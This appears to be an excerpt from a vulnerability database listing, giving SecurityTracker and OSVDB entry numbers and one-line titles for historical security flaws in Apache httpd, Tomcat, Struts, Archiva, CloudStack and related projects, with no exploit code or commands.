8802| [1026295] Apache Tomcat Lets Untrusted Web Applications Gain Elevated Privileges
8803| [1026267] Apache .htaccess File Integer Overflow Lets Local Users Execute Arbitrary Code
8804| [1026144] Apache mod_proxy Pattern Matching Bug Lets Remote Users Access Internal Servers
8805| [1026095] Apache Tomcat HTTP DIGEST Authentication Weaknesses Let Remote Users Conduct Bypass Attacks
8806| [1026054] Apache mod_proxy_ajp HTTP Processing Error Lets Remote Users Deny Service
8807| [1025993] Apache Tomcat AJP Protocol Processing Bug Lets Remote Users Bypass Authentication or Obtain Information
8808| [1025976] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
8809| [1025960] Apache httpd Byterange Filter Processing Error Lets Remote Users Deny Service
8810| [1025925] Apache Tomcat Commons Daemon jsvc Lets Local Users Gain Elevated Privileges
8811| [1025924] Apache Tomcat XML Validation Flaw Lets Applications Obtain Potentially Sensitive Information
8812| [1025788] Apache Tomcat Lets Malicious Applications Obtain Information and Deny Service
8813| [1025755] Apache Santuario Buffer Overflow Lets Remote Users Deny Service
8814| [1025712] Apache Tomcat Discloses Passwords to Local Users in Certain Cases
8815| [1025577] Apache Archiva Input Validation Hole Permits Cross-Site Scripting Attacks
8816| [1025576] Apache Archiva Request Validation Flaw Permits Cross-Site Request Forgery Attacks
8817| [1025527] Apache APR Library apr_fnmatch() Flaw Lets Remote Users Execute Arbitrary Code
8818| [1025303] Apache Tomcat HTTP BIO Connector Error Discloses Information From Different Requests to Remote Users
8819| [1025215] Apache Tomcat May Ignore @ServletSecurity Annotation Protections
8820| [1025066] Apache Continuum Input Validation Flaw Permits Cross-Site Request Forgery Attacks
8821| [1025065] Apache Continuum Input Validation Hole Permits Cross-Site Scripting Attacks
8822| [1025027] Apache Tomcat maxHttpHeaderSize Parsing Error Lets Remote Users Deny Service
8823| [1025026] Apache Tomcat Manager Input Validation Hole Permits Cross-Site Scripting Attacks
8824| [1025025] Apache Tomcat Security Manager Lets Local Users Bypass File Permissions
8825| [1024764] Apache Tomcat Manager Input Validation Hole in 'sessionList.jsp' Permits Cross-Site Scripting Attacks
8826| [1024417] Apache Traffic Server Insufficient Randomization Lets Remote Users Poison the DNS Cache
8827| [1024332] Apache mod_cache and mod_dav Request Processing Flaw Lets Remote Users Deny Service
8828| [1024180] Apache Tomcat 'Transfer-Encoding' Header Processing Flaw Lets Remote Users Deny Service and Obtain Potentially Sensitive Information
8829| [1024096] Apache mod_proxy_http May Return Results for a Different Request
8830| [1023942] Apache mod_proxy_ajp Error Condition Lets Remote Users Deny Service
8831| [1023941] Apache ap_read_request() Memory Error May Let Remote Users Access Potentially Sensitive Information
8832| [1023778] Apache ActiveMQ Input Validation Flaw Permits Cross-Site Scripting Attacks
8833| [1023701] Apache mod_isapi Error Processing Flaw May Let Remote Users Deny Service
8834| [1023533] Apache mod_proxy Integer Overflow May Let Remote Users Execute Arbitrary Code
8835| [1022988] Apache Solaris Support Code Bug Lets Remote Users Deny Service
8836| [1022529] Apache mod_deflate Connection State Bug Lets Remote Users Deny Service
8837| [1022509] Apache mod_proxy stream_reqbody_cl() Infinite Loop Lets Remote Users Deny Service
8838| [1022296] Apache IncludesNoExec Options Restrictions Can Be Bypass By Local Users
8839| [1022264] Apache mod_proxy_ajp Bug May Disclose Another User's Response Data
8840| [1022001] Apache Tomcat mod_jk May Disclose Responses to the Wrong User
8841| [1021988] mod_perl Input Validation Flaw in Apache::Status and Apache2::Status Permits Cross-Site Scripting Attacks
8842| [1021350] NetWare Bug Lets Remote Users Access the ApacheAdmin Console
8843| [1020635] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
8844| [1020520] Oracle WebLogic Apache Connector Lets Remote Users Execute Arbitrary Code
8845| [1020267] Apache mod_proxy Interim Response Process Bug Lets Remote Users Deny Service
8846| [1019784] Apache-SSL Certificate Processing Bug May Let Remote Users View Portions of Kernel Memory
8847| [1019256] Apache mod_negotiation Input Validation Hole Permits Cross-Site Scripting Attacks
8848| [1019194] Apache Input Validation Hole in Mod_AutoIndex When the Character Set is Undefined May Permit Cross-Site Scripting Attacks
8849| [1019185] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
8850| [1019154] Apache Input Validation Hole in mod_status Permits Cross-Site Scripting Attacks
8851| [1019093] Apache Input Validation Hole in mod_imap Permits Cross-Site Scripting Attacks
8852| [1019030] Apache Input Validation Hole in Default HTTP 413 Error Page Permits Cross-Site Scripting Attacks
8853| [1018633] Apache mod_proxy Bug Lets Remote Users Deny Service
8854| [1018304] Apache HTTPD scoreboard Protection Flaw Lets Local Users Terminate Arbitrary Processes
8855| [1018303] Apache HTTPD mod_cache May Let Remote Users Deny Service
8856| [1018302] Apache mod_status Input Validation Hole Permits Cross-Site Scripting Attacks
8857| [1018269] Apache Tomcat Input Validation Hole in Processing Accept-Language Header Permits Cross-Site Scripting Attacks
8858| [1017904] Apache suEXEC Bugs May Let Local Users Gain Elevated Privileges
8859| [1017719] Apache Tomcat JK Web Server Connector Buffer Overflow in map_uri_to_worker() Lets Remote Users Execute Arbitrary Code
8860| [1017062] Apache mod_tcl Format String Bug in set_var() Function May Let Remote Users Execute Arbitrary Code
8861| [1016601] Apache mod_rewrite Off-by-one Error Lets Remote Users Execute Arbitrary Code
8862| [1016576] Apache Tomcat Discloses Directory Listings to Remote Users
8863| [1015447] Apache mod_ssl Null Pointer Dereference May Let Remote Users Deny Service
8864| [1015344] Apache mod_imap Input Validation Flaw in Referer Field Lets Remote Users Conduct Cross-Site Scripting Attacks
8865| [1015093] Apache Memory Leak in MPM 'worker.c' Code May Let Remote Users Deny Service
8866| [1014996] ApacheTop Unsafe Temporary File May Let Local Users Gain Elevated Privileges
8867| [1014833] Apache ssl_hook_Access() Function May Fail to Verify Client Certificates
8868| [1014826] Apache Memory Leak in 'byterange filter' Lets Remote Users Deny Service
8869| [1014575] Apache mod_ssl Off-by-one Buffer Overflow in Processing CRLs May Let Remote Users Deny Service
8870| [1014323] Apache Chunked Transfer-Encoding and Content-Length Processing Lets Remote Users Smuggle HTTP Requests
8871| [1013156] Apache mod_python Publisher Handler Discloses Information to Remote Users
8872| [1012829] Apache mod_auth_radius radcpy() Integer Overflow Lets Remote Users Deny Service in Certain Cases
8873| [1012416] Apache on Apple OS X Lets Remote Users Bypass Apache File Handlers and Directly Access Files
8874| [1012415] Apache on Apple HFS+ Filesystems May Disclose '.DS_Store' Files to Remote Users
8875| [1012414] Apache mod_digest_apple Lets Remote Users Replay Authentication Credentials
8876| [1012083] Apache Web Server Error in Processing Requests With Many Space Characters Lets Remote Users Deny Service
8877| [1011783] Apache mod_include Buffer Overflow Lets Local Users Execute Arbitrary Code
8878| [1011557] Apache mod_ssl SSLCipherSuite Directive Can By Bypassed in Certain Cases
8879| [1011385] Apache Satsify Directive Error May Let Remote Users Access Restricted Resources
8880| [1011340] Apache SSL Connection Abort State Error Lets Remote Users Deny Service
8881| [1011303] Apache ap_resolve_env() Buffer Overflow in Reading Configuration Files May Let Local Users Gain Elevated Privileges
8882| [1011299] Apache IPv6 Address Parsing Flaw May Let Remote Users Deny Service
8883| [1011248] Apache mod_dav LOCK Method Error May Let Remote Users Deny Service
8884| [1011213] Apache mod_ssl Can Be Crashed By Remote Users When Reverse Proxying SSL Connections
8885| [1010674] Apache Can Be Crashed By PHP Code Invoking Nested Remote Sockets
8886| [1010599] Apache httpd Header Line Memory Allocation Lets Remote Users Crash the Server
8887| [1010462] Apache mod_proxy Buffer Overflow May Let Remote Users Execute Arbitrary Code
8888| [1010322] Apache mod_ssl Stack Overflow in ssl_util_uuencode_binary() May Let Remote Users Execute Arbitrary Code
8889| [1010270] cPanel Apache mod_phpsuexec Options Let Local Users Gain Elevated Privileges
8890| [1009934] Apache Web Server Has Buffer Overflow in ebcdic2ascii() on Older Processor Architectures
8891| [1009516] Apache mod_survey HTML Report Format Lets Remote Users Conduct Cross-Site Scripting Attacks
8892| [1009509] Apache mod_disk_cache Stores Authentication Credentials on Disk
8893| [1009495] Apache Web Server Socket Starvation Flaw May Let Remote Users Deny Service
8894| [1009417] GroupWise WebAccess With Apache on NetWare Has Configuration Flaw That May Grant Web Access to Remote Users
8895| [1009338] Apache mod_access Parsing Flaw May Fail to Enforce Allow/Deny Rules
8896| [1009337] Apache mod_ssl Memory Leak Lets Remote Users Crash the Daemon
8897| [1009182] Apache for Cygwin '..%5C' Input Validation Flaw Discloses Files to Remote Users
8898| [1008973] PHP May Apply Incorrect php_admin_* Settings To Requests for Apache Virtual Hosts
8899| [1008967] Apache-SSL 'SSLFakeBasicAuth' Lets Remote Users Forge Client Certificates to Be Authenticated
8900| [1008920] Apache mod_digest May Validate Replayed Client Responses
8901| [1008828] Apache mod_python String Processing Bug Still Lets Remote Users Crash the Web Server
8902| [1008822] Apache mod_perl File Descriptor Leak May Let Local Users Hijack the http and https Services
8903| [1008675] mod_auth_shadow Apache Module Authenticates Expired Passwords
8904| [1008559] Apache mod_php File Descriptor Leak May Let Local Users Hijack the https Service
8905| [1008335] Apache mod_python String Processing Bug Lets Remote Users Crash the Web Server
8906| [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters
8907| [1008030] Apache mod_rewrite Contains a Buffer Overflow
8908| [1008029] Apache mod_alias Contains a Buffer Overflow
8909| [1008028] Apache mod_cgid May Disclose CGI Output to Another Client
8910| [1007995] Apache Cocoon Forms May Let Remote Users Execute Arbitrary Java Code on the System
8911| [1007993] Apache Cocoon 'view-source' Sample Script Discloses Files to Remote Users
8912| [1007823] Apache Web Server mod_cgi Error May Let Malicious CGI Scripts Crash the Web Service
8913| [1007664] Apache::Gallery Unsafe Temporary Files May Let Local Users Gain Apache Web Server Privileges
8914| [1007557] Apache Web Server Does Not Filter Terminal Escape Sequences From Log Files
8915| [1007230] Apache HTTP Server 'rotatelogs' Bug on Win32 and OS/2 May Cause the Logging to Stop
8916| [1007146] Apache HTTP Server FTP Proxy Bug May Cause Denial of Service Conditions
8917| [1007145] Apache 'accept()' Errors May Cause Denial of Service Conditions
8918| [1007144] Apache Web Server 'type-map' File Error Permits Local Denial of Service Attacks
8919| [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases
8920| [1006864] Apache Web Server Can Be Crashed By Remote Users Via mod_dav Flaws and Also Via Basic Authentication
8921| [1006709] Apache mod_survey Input Validation Flaw Lets Remote Users Fill Up Disk Space
8922| [1006614] Apache mod_ntlm Buffer Overflow and Format String Flaw Let Remote Users Execute Arbitary Code
8923| [1006591] Apache mod_access_referer Module Null Pointer Dereference May Faciliate Denial of Service Attacks
8924| [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service
8925| [1006021] Apache Tomcat Server URL Parsing Error May Disclose Otherwise Inaccessible Web Directory Listings and Files to Remote Users
8926| [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
8927| [1005962] Apache Web Server Path Parsing Flaw May Allow Remote Users to Execute Code in Certain Configurations
8928| [1005848] Apache 'printenv' Script Input Validation Bugs in Older Versions May Let Remote Users Conduct Cross-Site Scripting Attacks
8929| [1005765] Apache mod_jk Module Processing Bug When Used With Tomcat May Disclose Information to Remote Users or Crash
8930| [1005548] Apache mod_php Module May Allow Local Users to Gain Control of the Web Port
8931| [1005499] Apache Web Server (2.0.42) May Disclose CGI Source Code to Remote Users When Used With WebDAV
8932| [1005410] Apache Tomcat Java Servlet Engine Can Be Crashed Via Multiple Requests for DOS Device Names
8933| [1005351] Apache Web Server (1.3.x) Shared Memory Scoreboard Bug Lets Certain Local Users Issue Signals With Root Privileges
8934| [1005331] Apache Web Server (2.x) SSI Server Signature Filtering Hole Lets Remote Users Conduct Cross-Site Scripting Attacks
8935| [1005290] Apache Tomcat Java Server Default Servlet Returns JSP Source Code to Remote Users
8936| [1005285] Apache Web Server 'mod_dav' Has Null Pointer Bug That May Allow Remote Users to Cause Denial of Service Conditions
8937| [1005010] Apache Web Server (2.0) Has Unspecified Flaw That Allows Remote Users to Obtain Sensitive Data and Cause Denial of Service Conditions
8938| [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users
8939| [1004745] Apache Tomcat Java Server Allows Cross-Site Scripting Attacks
8940| [1004636] Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code
8941| [1004602] Apache Tomcat Java Server for Windows Can Be Crashed By Remote Users Sending Malicious Requests to Hang All Available Working Threads
8942| [1004586] Apache Tomcat Java Server May Disclose the Installation Path to Remote Users
8943| [1004555] Apache Web Server Chunked Encoding Flaw May Let Remote Users Execute Arbitrary Code on the Server
8944| [1004209] Apache 'mod_python' Python Language Interpreter Bug in Publisher Handler May Allow Remote Users to Modify Files on the System
8945| [1003874] Apache Web Server for Windows Has Batch File Processing Hole That Lets Remote Users Execute Commands on the System
8946| [1003767] 'mod_frontpage' Module for Apache Web Server Has Buffer Overlow in 'fpexec.c' That Allows Remote Users to Execute Arbitrary Code on the System with Root Privileges
8947| [1003723] Apache-SSL for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
8948| [1003664] 'mod_ssl' Security Package for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
8949| [1003602] GNUJSP Java Server Pages Implementation Discloses Web Files and Source Code to Remote Users and Bypasses Apache Access Control Restrictions
8950| [1003465] PHP for Apache Web Server May Disclose Installation Path Information to Remote Users Making 'OPTIONS' Requests
8951| [1003451] Oracle Application Server PL/SQL Module for Apache Has Buffer Overflows That Allow Remote Users to Execute Arbitrary Code and Gain Access to the Server
8952| [1003131] Apache Web Server in Virtual Hosting Mode Can Be Crashed By a Local User Removing a Log Directory
8953| [1003104] PHP.EXE Windows CGI for Apache Web Server May Let Remote Users View Files on the Server Due to Configuration Error
8954| [1003008] Apache 'mod_bf' Module Lets Remote Users Execute Arbitrary Code
8955| [1002629] Apache suEXEC Wrapper Fails to Observe Minimum Group ID Security Settings in Certain Situations
8956| [1002542] Apache Web Server Virtual Hosting Split-Logfile Function Lets Remote Users Write Log Entries to Arbitrary Files on the System
8957| [1002400] Apache mod_gzip Module Has Buffer Overflow That Can Be Exploited By Local Users to Gain Elevated Privileges
8958| [1002303] Several 3rd Party Apache Authentication Modules Allow Remote Users to Execute Arbitrary Code to Gain Access to the System or Execute Stored Procedures to Obtain Arbitrary Database Information
8959| [1002188] Apache Web Server Discloses Internal IP Addresses to Remote Users in Certain Configurations
8960| [1001989] Apache Web Server May Disclose Directory Contents Even If an Index.html File is Present in the Directory
8961| [1001719] Apache Web Server on Mac OS X Client Fails to Enforce File and Directory Access Protections, Giving Remote Users Access to Restricted Pages
8962| [1001572] Apache Web Server on Microsoft Windows Platforms Allows Remote Users to Crash the Web Server
8963| [1001304] Apache Web Server for Windows Lets Remote Users Crash the Web Server Application
8964| [1001083] Apache Web Server May Display Directory Index Listings Even if Directory Listings Are Disabled
8965|
8966| OSVDB - http://www.osvdb.org:
8967| [96078] Apache CloudStack Infrastructure Menu Setup Network Multiple Field XSS
8968| [96077] Apache CloudStack Global Settings Multiple Field XSS
8969| [96076] Apache CloudStack Instances Menu Display Name Field XSS
8970| [96075] Apache CloudStack Instances Menu Add Instances Network Name Field XSS
8971| [96074] Apache CloudStack Instances Menu Add Instances Review Step Multiple Field XSS
8972| [96031] Apache HTTP Server suEXEC Symlink Arbitrary File Access
8973| [95888] Apache Archiva Single / Double Quote Character Handling XSS Weakness
8974| [95885] Apache Subversion mod_dav_svn Module Crafted HTTP Request Handling Remote DoS
8975| [95706] Apache OpenOffice.org (OOo) OOXML Document File XML Element Handling Memory Corruption
8976| [95704] Apache OpenOffice.org (OOo) DOC File PLCF Data Handling Memory Corruption
8977| [95603] Apache Continuum web/util/GenerateRecipentNotifier.java recipient Parameter XSS
8978| [95602] Apache Continuum web/action/notifier/JabberProjectNotifierEditAction-jabberProjectNotifierSave-validation.xml Multiple Parameter XSS
8979| [95601] Apache Continuum web/action/notifier/JabberGroupNotifierEditAction-jabberProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
8980| [95600] Apache Continuum web/action/ScheduleAction-saveSchedule-validation.xml Multiple Parameter XSS
8981| [95599] Apache Continuumweb/action/BuildDefinitionAction-saveBuildDefinition-validation.xml Multiple Parameter XSS
8982| [95598] Apache Continuum web/action/AddProjectAction-addProject-validation.xml Multiple Parameter XSS
8983| [95597] Apache Continuum web/action/ProjectEditAction-projectSave-validation.xml Multiple Parameter XSS
8984| [95596] Apache Continuum web/action/notifier/IrcGroupNotifierEditAction-ircProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
8985| [95595] Apache Continuum web/action/notifier/IrcProjectNotifierEditAction-ircProjectNotifierSave-validation.xml Multiple Parameter XSS
8986| [95594] Apache Continuum web/action/ProjectGroupAction.java Multiple Parameter XSS
8987| [95593] Apache Continuum web/action/AddProjectGroupAction.java Multiple Parameter XSS
8988| [95592] Apache Continuum web/action/AddProjectAction.java Multiple Parameter XSS
8989| [95523] Apache OFBiz Webtools Application View Log Screen Unspecified XSS
8990| [95522] Apache OFBiz Nested Expression Evaluation Arbitrary UEL Function Execution
8991| [95521] Apache HTTP Server mod_session_dbd Session Saving Unspecified Issue
8992| [95498] Apache HTTP Server mod_dav.c Crafted MERGE Request Remote DoS
8993| [95406] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Arbitrary Site Redirect
8994| [95405] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Remote Code Execution
8995| [95011] Apache CXF XML Parser SOAP Message Handling CPU Resource Exhaustion Remote DoS
8996| [94705] Apache Geronimo RMI Classloader Exposure Serialized Object Handling Remote Code Execution
8997| [94651] Apache Santuario (XML Security for C++) XML Signature CanonicalizationMethod Parameter Spoofing Weakness
8998| [94636] Apache Continuum workingCopy.action userDirectory Traversal Arbitrary File Access
8999| [94635] Apache Maven SCM SvnCommandlineUtils Process Listing Local Password Disclosure
9000| [94632] Apache Maven Wagon SSH (wagon-ssh) Host Verification Failure MitM Weakness
9001| [94625] Apache Santuario (XML Security for C++) XML Signature Reference Crafted XPointer Expression Handling Heap Buffer Overflow
9002| [94618] Apache Archiva /archiva/security/useredit.action username Parameter XSS
9003| [94617] Apache Archiva /archiva/security/roleedit.action name Parameter XSS
9004| [94616] Apache Archiva /archiva/security/userlist!show.action roleName Parameter XSS
9005| [94615] Apache Archiva /archiva/deleteArtifact!doDelete.action groupId Parameter XSS
9006| [94614] Apache Archiva /archiva/admin/addLegacyArtifactPath!commit.action legacyArtifactPath.path Parameter XSS
9007| [94613] Apache Archiva /archiva/admin/addRepository.action Multiple Parameter XSS
9008| [94612] Apache Archiva /archiva/admin/editAppearance.action Multiple Parameter XSS
9009| [94611] Apache Archiva /archiva/admin/addLegacyArtifactPath.action Multiple Parameter XSS
9010| [94610] Apache Archiva /archiva/admin/addNetworkProxy.action Multiple Parameter XSS
9011| [94403] Apache Santuario (XML Security for C++) InclusiveNamespace PrefixList Processing Heap Overflow
9012| [94402] Apache Santuario (XML Security for C++) HMAC-based XML Signature Processing DoS
9013| [94401] Apache Santuario (XML Security for C++) XPointer Evaluation Stack Overflow
9014| [94400] Apache Santuario (XML Security for C++) HMAC-Based XML Signature Reference Element Validation Spoofing Weakness
9015| [94279] Apache Qpid CA Certificate Validation Bypass
9016| [94275] Apache Solr JettySolrRunner.java Can Not Find Error Message XSS
9017| [94233] Apache OpenJPA Object Deserialization Arbitrary Executable Creation
9018| [94042] Apache Axis JAX-WS Java Unspecified Exposure
9019| [93969] Apache Struts OGNL Expression Handling Double Evaluation Error Remote Command Execution
9020| [93796] Apache Subversion Filename Handling FSFS Repository Corruption Remote DoS
9021| [93795] Apache Subversion svnserve Server Aborted Connection Message Handling Remote DoS
9022| [93794] Apache Subversion contrib/hook-scripts/check-mime-type.pl svnlook Hyphenated argv Argument Handling Remote DoS
9023| [93793] Apache Subversion contrib/hook-scripts/svn-keyword-check.pl Filename Handling Remote Command Execution
9024| [93646] Apache Struts Crafted Parameter Arbitrary OGNL Code Execution
9025| [93645] Apache Struts URL / Anchor Tag includeParams Attribute Remote Command Execution
9026| [93636] Apache Pig Multiple Physical Operator Memory Exhaustion Remote Remote DoS
9027| [93635] Apache Wink DTD (Document Type Definition) Expansion Data Parsing Information Disclosure
9028| [93605] RT Apache::Session::File Session Replay Reuse Information Disclosure
9029| [93599] Apache Derby SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY Boot Password Manipulation Re-encryption Failure Password Corruption
9030| [93555] Apache Commons Codec Invalid Base32 String Information Tunneling Weakness
9031| [93554] Apache HBase bulkLoadHFiles() Method ACL Bypass
9032| [93543] JBoss Enterprise Application Platform org.apache.catalina.connector.Response.encodeURL() Method MitM jsessionid Disclosure
9033| [93542] Apache ManifoldCF (Connectors Framework) org.apache.manifoldcf.crawler.ExportConfiguration Class Configuration Export Password Disclosure
9034| [93541] Apache Solr json.wrf Callback XSS
9035| [93524] Apache Hadoop GetSecurityDescriptorControl() Function Absolute Security Descriptor Handling NULL Descriptor Weakness
9036| [93521] Apache jUDDI Security API Token Session Persistence Weakness
9037| [93520] Apache CloudStack Default SSL Key Weakness
9038| [93519] Apache Shindig /ifr Cross-site Arbitrary Gadget Invocation
9039| [93518] Apache Solr /admin/analysis.jsp name Parameter XSS
9040| [93517] Apache CloudStack setup-cloud-management /etc/sudoers Modification Local Privilege Escalation
9041| [93516] Apache CXF UsernameTokenInterceptor Nonce Caching Replay Weakness
9042| [93515] Apache HBase table.jsp name Parameter XSS
9043| [93514] Apache CloudStack Management Server Unauthenticated Remote JMX Connection Default Setting Weakness
9044| [93463] Apache Struts EL / OGNL Interpretation Unspecified Remote Code Execution
9045| [93462] Apache CXF WS-SecurityPolicy AlgorithmSuite Arbitrary Ciphertext Decryption Weakness
9046| [93401] Apache Hadoop core-site.xml Permission Weakness Local Alfredo Secret Disclosure
9047| [93400] Apache Hadoop Map/Reduce Job Log Directory Symlink Arbitrary File Mode Manipulation
9048| [93397] Apache Wicket Referrer HTTP Header Session ID Disclosure
9049| [93366] Apache HTTP Server modules/mappers/mod_rewrite.c do_rewritelog() Function Log File Terminal Escape Sequence Filtering Remote Command Execution
9050| [93254] Apache Tomcat AsyncListener Method Cross-session Information Disclosure
9051| [93253] Apache Tomcat Chunked Transfer Encoding Data Saturation Remote DoS
9052| [93252] Apache Tomcat FORM Authenticator Session Fixation
9053| [93172] Apache Camel camel/endpoints/ Endpoint XSS
9054| [93171] Apache Sling HtmlResponse Error Message XSS
9055| [93170] Apache Directory DelegatingAuthenticator MitM Spoofing Weakness
9056| [93169] Apache Wave AuthenticationServlet.java Session Fixation Weakness
9057| [93168] Apache Click ErrorReport.java id Parameter XSS
9058| [93167] Apache ActiveMQ JMSXUserId Spoofing Weakness
9059| [93166] Apache CXF Crafted Message Element Count Handling System Resource Exhaustion Remote DoS
9060| [93165] Apache CXF Crafted Message Element Level Handling System Resource Exhaustion Remote DoS
9061| [93164] Apache Harmony DatagramSocket Class connect Method CheckAccept() IP Blacklist Bypass
9062| [93163] Apache Hadoop Map/Reduce Daemon Symlink Arbitrary File Overwrite
9063| [93162] Apache VelocityStruts struts/ErrorsTool.getMsgs Error Message XSS
9064| [93161] Apache CouchDB Rewriter VM Atom Table Memory Exhaustion Remote DoS
9065| [93158] Apache Wicket BookmarkablePageLink Feature XSS CSRF
9066| [93157] Apache Struts UrlHelper.java s:url includeParams Functionality XSS
9067| [93156] Apache Tapestry Calendar Component datefield.js datefield Parameter XSS
9068| [93155] Apache Struts fielderror.ftl fielderror Parameter Error Message XSS
9069| [93154] Apache JSPWiki Edit.jsp createPages WikiPermission Bypass
9070| [93153] Apache PDFBox PDFXrefStreamParser Missing Element Handling PDF Parsing DoS
9071| [93152] Apache Hadoop HttpServer.java Multiple Function XSS
9072| [93151] Apache Shiro Search Filter userName Parameter LDAP Code Injection Weakness
9073| [93150] Apache Harmony java.net.SocketPermission Class boolean equals Function checkConnect() Weakness Host Name Retrieval
9074| [93149] Apache Harmony java.security.Provider Class void load Function checkSecurityAccess() Weakness
9075| [93148] Apache Harmony java.security.ProtectionDomain Class java.lang.String.toString() Function checkPermission() Weakness
9076| [93147] Apache Harmony java.net.URLConnection openConnection Function checkConnect Weakness Proxy Connection Permission Bypass
9077| [93146] Apache Harmony java.net.ServerSocket Class void implAccept Function checkAccept() Weakness SerSocket Subclass Creation
9078| [93145] Apache Qpid JMS Client Detached Session Frame Handling NULL Pointer Dereference Remote DoS
9079| [93144] Apache Solr Admin Command Execution CSRF
9080| [93009] Apache VCL XMLRPC API Unspecified Function Remote Privilege Escalation
9081| [93008] Apache VCL Web GUI Unspecified Remote Privilege Escalation
9082| [92997] Apache Commons Codec org.apache.commons.codec.net.URLCodec Fields Missing 'final' Thread-safety Unspecified Issue
9083| [92976] Apache ActiveMQ scheduled.jsp crontab Command XSS
9084| [92947] Apache Commons Codec org.apache.commons.codec.language.Soundex.US_ENGLISH_MAPPING Missing MS_PKGPROTECT Field Manipulation Unspecified Issue
9085| [92749] Apache CloudStack Predictable Hash Virtual Machine Console Console Access URL Generation
9086| [92748] Apache CloudStack VM Console Access Restriction Bypass
9087| [92709] Apache ActiveMQ Web Console Unauthenticated Remote Access
9088| [92708] Apache ActiveMQ Sample Web Application Broker Resource Consumption Remote DoS
9089| [92707] Apache ActiveMQ webapp/websocket/chat.js Subscribe Message XSS
9090| [92706] Apache ActiveMQ Debug Log Rendering XSS
9091| [92705] Apache ActiveMQ PortfolioPublishServlet.java refresh Parameter XSS
9092| [92270] Apache Tomcat Unspecified CSRF
9093| [92094] Apache Subversion mod_dav_svn Module Nonexistent URL Lock Request Handling NULL Pointer Dereference Remote DoS
9094| [92093] Apache Subversion mod_dav_svn Module Activity URL PROPFIND Request Handling NULL Pointer Dereference Remote DoS
9095| [92092] Apache Subversion mod_dav_svn Module Log REPORT Request Handling NULL Pointer Dereference Remote DoS
9096| [92091] Apache Subversion mod_dav_svn Module Node Property Handling Resource Exhaustion Remote DoS
9097| [92090] Apache Subversion mod_dav_svn Module Activity URL Lock Request Handling NULL Pointer Dereference Remote DoS
9098| [91774] Apache Commons Codec Unspecified Non-private Field Manipulation Weakness
9099| [91628] mod_ruid2 for Apache HTTP Server fchdir() Inherited File Descriptor chroot Restriction Bypass
9100| [91328] Apache Wicket $up$ Traversal Arbitrary File Access
9101| [91295] Apple Mac OS X Apache Unicode Character URI Handling Authentication Bypass
9102| [91235] Apache Rave /app/api/rpc/users/get User Object Hashed Password Remote Disclosure
9103| [91185] Munin Default Apache Configuration Permission Weakness Remote Information Disclosure
9104| [91173] Apache Wicket WebApplicationPath Constructor Bypass /WEB-INF/ Directory File Access
9105| [91172] Apache Wicket PackageResourceGuard File Extension Filter Bypass
9106| [91025] Apache Qpid qpid::framing::Buffer Class Multiple Method Out-of-bounds Access Remote DoS
9107| [91024] Apache Qpid federation_tag Attribute Handling Federated Interbroker Link Access Restriction Bypass
9108| [91023] Apache Qpid AMQP Type Decoder Exposure Array Size Value Handling Memory Consumption Remote DoS
9109| [91022] Apache Qpid qpid/cpp/include/qpid/framing/Buffer.h qpid::framing::Buffer::checkAvailable() Function Integer Overflow
9110| [90986] Apache Jena ARQ INSERT DATA Request Handling Overflow
9111| [90907] Apache Subversion mod_dav_svn / libsvn_fs svn_fs_file_length() Function MKACTIVITY / PROPFIND Option Request Handling Remote DoS
9112| [90906] Apache Commons FileUpload /tmp Storage Symlink Arbitrary File Overwrite
9113| [90864] Apache Batik 1xx Redirect Script Origin Restriction Bypass
9114| [90858] Apache Ant Malformed TAR File Handling Infinite Loop DoS
9115| [90852] Apache HTTP Server for Debian apachectl /var/lock Permission Weakness Symlink Directory Permission Manipulation
9116| [90804] Apache Commons CLI Path Subversion Local Privilege Escalation
9117| [90802] Apache Avro Recursive Schema Handling Infinite Recursion DoS
9118| [90592] Apache Batik ApplicationSecurityEnforcer.java Multiple Method Security Restriction Bypass
9119| [90591] Apache Batik XML External Entity (XXE) Data Parsing Arbitrary File Disclosure
9120| [90565] Apache Tomcat Log Directory Permission Weakness Local Information Disclosure
9121| [90564] Apache Maven / Maven Wagon SSL Certificate Validation MitM Spoofing Weakness
9122| [90557] Apache HTTP Server mod_proxy_balancer balancer-manager Interface Multiple Parameter XSS
9123| [90556] Apache HTTP Server Multiple Module Multiple Parameter XSS
9124| [90276] Apache Axis2 axis2.xml Plaintext Password Local Disclosure
9125| [90249] Apache Axiom ClassLoader XMLInputFactory / XMLOutputFactory Construction Unspecified Issue
9126| [90235] Apache Commons HttpClient Certificate Wildcard Matching Weakness
9127| [90079] Apache CXF WSS4JInInterceptor URIMappingInterceptor WS-Security SOAP Service Access Restriction Bypass
9128| [90078] Apache CXF WS-SecurityPolicy Enabled Plaintext UsernameTokens Handling Authentication Bypass
9129| [89453] Apache Open For Business Project (OFBiz) Screenlet.title Widget Attribute XSS
9130| [89452] Apache Open For Business Project (OFBiz) Image.alt Widget Attribute XSS
9131| [89294] Apache CouchDB Futon UI Browser-based Test Suite Query Parameter XSS
9132| [89293] Apache CouchDB Unspecified Traversal Arbitrary File Access
9133| [89275] Apache HTTP Server mod_proxy_ajp Module Expensive Request Parsing Remote DoS
9134| [89267] Apache CouchDB JSONP Callback Handling Unspecified XSS
9135| [89146] Apache CloudStack Master Server log4j.conf SSH Private Key / Plaintext Password Disclosure
9136| [88603] Apache OpenOffice.org (OOo) Unspecified Information Disclosure
9137| [88602] Apache OpenOffice.org (OOo) Unspecified Manifest-processing Issue
9138| [88601] Apache OpenOffice.org (OOo) Unspecified PowerPoint File Handling Issue
9139| [88285] Apache Tomcat Partial HTTP Request Saturation Remote DoS
